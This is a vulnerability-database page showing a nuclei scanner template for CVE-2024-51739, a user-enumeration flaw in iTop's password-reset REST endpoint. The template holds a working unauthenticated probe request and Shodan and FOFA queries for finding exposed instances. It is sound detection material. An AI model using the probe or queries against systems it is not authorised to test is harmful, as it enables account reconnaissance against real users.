Lucene search
K

iTop - User Enumeration via REST Endpoint

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

iTop allows user enumeration via REST when resetting passwords for non-existent users.

Related
Refs
Code
id: CVE-2024-51739

info:
  name: iTop - User Enumeration via REST Endpoint
  author: DhiyaneshDk
  severity: medium
  description: |
    From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is `do_reset_pwd`, allowing to reset a user password. This feature can be abused to perform user enumeration when a non-existent user is provided.
  impact: |
    Attackers can exploit this vulnerability to compromise system security.
  remediation: |
    Apply security patches to address CVE-2024-51739.
  reference:
    - https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
    - https://github.com/Combodo/iTop/security/advisories/GHSA-2hmf-p27w-phf9
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-51739
    cwe-id: CWE-200
    epss-score: 0.01259
    epss-percentile: 0.66042
    cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: combodo
    product: itop
    shodan-query: http.html:" itop login"
    fofa-query: body=" itop login"
  tags: cve,cve2024,itop,enum,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist"

    matchers:
      - type: word
        part: body
        words:
          - "<h1>Reset password</h1>"
          - "&#039;doesnotexist&#039; is not a valid login"
        condition: and
# digest: 4a0a0047304502207d2e4a629c9407cadd3f189a65dda2f49589173a5a8cee39565417cdaf87b61b022100a969f717638d5f2855df267742160c227386c3d9b68a75ad686e4f110aaf8abd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.15.3 - 7.5
EPSS0.01259
SSVC
30